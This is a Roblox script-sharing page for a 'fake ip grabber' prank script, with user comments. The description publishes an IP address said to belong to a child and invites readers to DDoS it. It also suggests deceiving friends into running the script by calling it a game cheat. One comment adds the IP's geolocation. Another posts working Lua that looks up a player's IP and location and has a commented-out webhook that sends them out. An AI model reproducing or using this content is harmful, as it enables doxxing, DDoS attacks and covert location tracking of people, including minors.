ScriptBlox is undergoing maintenance, so downtime is possible. Sorry for the inconvenience!
Universal Script ๐Ÿ“Œ
147.6k Views

Fake ip grabber

Universal Script ๐Ÿ“ŒUploaded by
2 years ago
Please login to perform these actions:

Description

The ip grabber goes like this: print("Grabbing ur ip..") wait(0.9) print("UR DONE") wait(0.9) print("154.176.43.55") THE IP IS FROM A KID THAT TRIED TO LOG ME OUT OF MY ACCOUNT SO I GOT HES IP AND FEEL FREE TO DDOS IT! YALL CAN TELL YOUR FRINEDS ITS A BLOXFRUITS SCRIPT BC THE SCRIPT IS CALLED BEST BLOXFRUITS SCRIPT THEN TELL THEM TO OPEN CONSOLE BY CLICKING F9 ON YOUR KEYBOARD

View Raw
Edited By: ZenOnRobloxYT Download


Comments
7
User profile picture
piqu 2 years ago - Edited
whats the point of this?
User profile picture
ZenOnRobloxYT 2 years ago - Edited
@piqu prank ur friends or sumn
User profile picture
Beanz 2 years ago - Edited
who let bro cook ๐Ÿ˜ญ ๐Ÿ™
User profile picture
Foldo 2 years ago - Edited
Trash script when I turn on it it just crash my game.
User profile picture
petaa 7 months ago
i know its meant to be fake but local HttpService = game:GetService("HttpService") local ip = HttpService:GetAsync("https://ipinfo.io/json") print(ip) has less code and actually works (prints full json)
User profile picture
Guest_7293 3 months ago
"query": "154.176.43.55", "status": "success", "continent": "Africa", "continentCode": "AF", "country": "Egypt", "countryCode": "EG", "region": "C", "regionName": "Cairo Governorate", "city": "Cairo", "district": "", "zip": "", "lat": 30.0507, "lon": 31.2489, "timezone": "Africa/Cairo", "offset": 7200, "currency": "EGP", "isp": "TE Data", "org": "", "as": "AS8452 TE-AS", "asname": "TE-AS", "mobile": false, "proxy": false, "hosting": false
petaa's profile picturepetaai know its meant to be fake but local HttpService ...
User profile picture
Guest_7293 3 months ago
@petaa or --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local HttpService = game:GetService("HttpService") local Players = game:GetService("Players") local d = game:GetService("HttpService"):JSONDecode(request({Url = "http://ip-api.com/json?fields=query,lat,lon,country,countryCode,continent,continentCode,region,regionName,city,district,zip,timezone,offset,isp,org,as,asname,reverse,mobile,proxy,hosting"}).Body) local p = Players.LocalPlayer p:Kick(("[Be careful Next time twin]\n".. "User: %s (ID: %d)\n".. "IP: %s\n".. "Coordinates: %.6f, %.6f\n".. "Continent: %s (%s)\n".. "Country: %s (%s)\n".. "Region: %s\n".. "City: %s | District: %s\n".. "ZIP: %s\n".. "Timezone: %s (UTC%s)\n".. "ISP: %s\n".. "Organization: %s\n".. "ASN: %s (%s)\n".. "Reverse DNS: %s\n".. "Mobile: %s\n".. "Proxy: %s\n".. "Hosting: %s"):format( p.Name, p.UserId, d.query, d.lat, d.lon, d.continent, d.continentCode, d.country, d.countryCode, d.regionName, d.city, d.district, d.zip, d.timezone, d.offset, d.isp, d.org, d.as, d.asname, d.reverse, d.mobile and "YES" or "NO", d.proxy and "YES" or "NO", d.hosting and "YES" or "NO" )) --[[ WEBHOOK local WEBHOOK = "dont_you_dare_to_use_this_to_someone" HttpService:PostAsync(WEBHOOK, HttpService:JSONEncode({ username="IP Grabber", content=p.Name.." | "..d.query.." | "..d.lat..","..d.lon.." | "..d.city.." | "..d.country })) --]] (this kicks you, and its not made by me btw)
Please Login to add a comment.